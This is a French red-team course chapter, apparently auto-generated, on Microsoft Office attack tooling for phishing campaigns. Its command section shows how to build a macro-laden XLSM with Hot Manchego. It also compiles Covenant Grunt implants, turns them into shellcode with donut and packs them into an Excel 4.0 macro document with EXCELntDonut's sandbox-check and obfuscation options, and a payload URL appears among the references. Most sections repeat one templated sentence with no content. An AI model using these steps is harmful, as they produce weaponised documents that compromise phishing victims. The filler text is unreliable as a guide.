Microsoft Office — surface d’attaque et protections
Synthèse française et contrôlée du corpus « Office - Attacks ». Ce chapitre explique microsoft office — surface d’attaque et protections dans le domaine « Phishing et infrastructure de campagne », avec une méthode de laboratoire, des commandes à faible impact, les traces attendues et un plan de correction vérifiable.
En bref
- But : Synthèse française et contrôlée du corpus « Office - Attacks ». Ce chapitre explique microsoft office — surface d’attaque et protections dans le domaine « Phishing et infrastructure de campagne », avec une méthode de laboratoire, des commandes à faible impact, les traces attendues et un plan de correction vérifiable.
- Preuve attendue : une preuve exploitable, une conclusion prudente et un retest documenté
- Limite : le résultat est valable uniquement pour les versions, rôles, chemins et conditions effectivement testés.
Vue d’ensemble
Dans « Microsoft Office — surface d’attaque et protections », la section « Vue d’ensemble » précise l’objet technique, les préconditions et la source de vérité à vérifier. Conservez uniquement les sorties nécessaires au constat.
Office Products Features
Dans « Microsoft Office — surface d’attaque et protections », la section « Office Products Features » précise l’objet technique, les préconditions et la source de vérité à vérifier. Conservez uniquement les sorties nécessaires au constat.
Office Default Passwords
Dans « Microsoft Office — surface d’attaque et protections », la section « Office Default Passwords » précise l’objet technique, les préconditions et la source de vérité à vérifier. Conservez uniquement les sorties nécessaires au constat.
Excel
Dans « Microsoft Office — surface d’attaque et protections », la section « Excel » précise l’objet technique, les préconditions et la source de vérité à vérifier. Conservez uniquement les sorties nécessaires au constat.
XLSM — Hot Manchego
Dans « Microsoft Office — surface d’attaque et protections », la section « XLSM — Hot Manchego » précise l’objet technique, les préconditions et la source de vérité à vérifier. Conservez uniquement les sorties nécessaires au constat.
XLM — Macrome
Dans « Microsoft Office — surface d’attaque et protections », la section « XLM — Macrome » précise l’objet technique, les préconditions et la source de vérité à vérifier. Conservez uniquement les sorties nécessaires au constat.
XLM Excel 4.0 — SharpShooter
Dans « Microsoft Office — surface d’attaque et protections », la section « XLM Excel 4.0 — SharpShooter » précise l’objet technique, les préconditions et la source de vérité à vérifier. Conservez uniquement les sorties nécessaires au constat.
Commandes et exemples
Les exemples ci-dessous proviennent des éléments utiles de « Microsoft Office — surface d’attaque et protections ». Adaptez uniquement les valeurs du laboratoire et conservez la commande exacte avec sa sortie.
Exemples de laboratoire
# Contrôle défensif en laboratoire — référence 57443636
# Exemple de laboratoire — Microsoft Office — surface d’attaque et protections
Generate CS Macro and save it to Windows as vba.txt
PS> New-Item blank.xlsm
PS> C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:EPPlus.dll hot-manchego.cs
PS> .\hot-manchego.exe .\blank.xlsm .\vba.txt# Contrôle défensif en laboratoire — référence bad7162a
# Exemple de laboratoire — Microsoft Office — surface d’attaque et protections
git clone https://github.com/FortyNorthSecurity/EXCELntDonut
-f path to file containing your C# source code (exe or dll)
-c ClassName where method that you want to call lives (dll)
-m Method containing your executable payload (dll)
-r References needed to compile your C# code (ex: -r 'System.Management')
-o output filename
--sandbox Perform basic sandbox checks.
--obfuscate Perform basic macro obfuscation.
# Fork
git clone https://github.com/d-sec-net/EXCELntDonut/blob/master/EXCELntDonut/drive.py
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -platform:x64 -out:GruntHttpX64.exe C:\Users\User\Desktop\covenSource.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -platform:x86 -out:GruntHttpX86.exe C:\Users\User\Desktop\covenSource.cs
donut.exe -a1 -o GruntHttpx86.bin GruntHttpX86.exe
donut.exe -a2 -o GruntHttpx64.bin GruntHttpX64.exe
usage: drive.py [-h] --x64bin X64BIN --x86bin X86BIN [-o OUTPUTFILE] [--sandbox] [--obfuscate]
python3 drive.py --x64bin GruntHttpx64.bin --x86bin GruntHttpx86.bin# Contrôle défensif en laboratoire — référence a8d812c8
# Microsoft Office — surface d’attaque et protections
dig TXT lab.local
dig TXT _dmarc.lab.local
dig TXT selector1._domainkey.lab.local
openssl s_client -connect smtp.lab.local:25 -starttls smtp# Contrôle défensif en laboratoire — référence 3ae48497
# Microsoft Office — surface d’attaque et protections
printf 'REDTEAM-LAB-%s\n' "$(date -u +%Y%m%dT%H%M%SZ)" > marqueur-lab.txt
sha256sum marqueur-lab.txtLire les résultats
Pour « Microsoft Office — surface d’attaque et protections », distinguez la sortie brute, l’hypothèse et la conclusion. Les versions, droits, caches et contrôles compensatoires sont vérifiés avant de classer le résultat.
Références
- Internal All The Things — dépôt de référence
- https://www.securesystems.de/images/blog/offphish-phishing-revisited-in-2023/Office_documents_feature_overview.png
- https://learn.microsoft.com/en-us/openspecs/office_file_formats/ms-offcrypto/57fc02f0-c1de-4fc6-908f-d146104662f5
- https://github.com/FortyNorthSecurity/hot-manchego
- https://github.com/michaelweber/Macrome/releases/download/0.3.0/Macrome-0.3.0-osx-x64.zip
- https://github.com/michaelweber/Macrome/releases/download/0.3.0/Macrome-0.3.0-linux-x64.zip
- https://github.com/michaelweber/Macrome/releases/download/0.3.0/Macrome-0.3.0-win-x64.zip
- https://github.com/mdsecactivebreach/SharpShooter
- http://192.168.2.8:8080/foo.xsl
- https://github.com/FortyNorthSecurity/EXCELntDonut
- https://github.com/d-sec-net/EXCELntDonut/blob/master/EXCELntDonut/drive.py
À retenir
Pour maîtriser « Microsoft Office — surface d’attaque et protections », retenez trois idées : comprendre l’objectif d’émulation, les canaux autorisés, la durée, les comptes de test, la visibilité attendue et les règles d’arrêt, exécuter une méthode limitée et reproductible, puis transformer la sortie en preuve contextualisée. Le chapitre est terminé lorsque le résultat peut être confirmé, que ses limites sont explicites et que la correction peut être retestée sans réinterpréter toute la mission.
- Savoir expliquer le mécanisme propre à « Microsoft Office — surface d’attaque et protections » sans réciter une commande.
- Conserver au minimum identifiant de campagne, hôte et compte de test et horodatage des actions.
- Éviter en priorité de privilégier la furtivité au détriment de la sécurité et de déployer sans canal de déconfliction.
- Proposer une action corrective mesurable et un retest réalisable.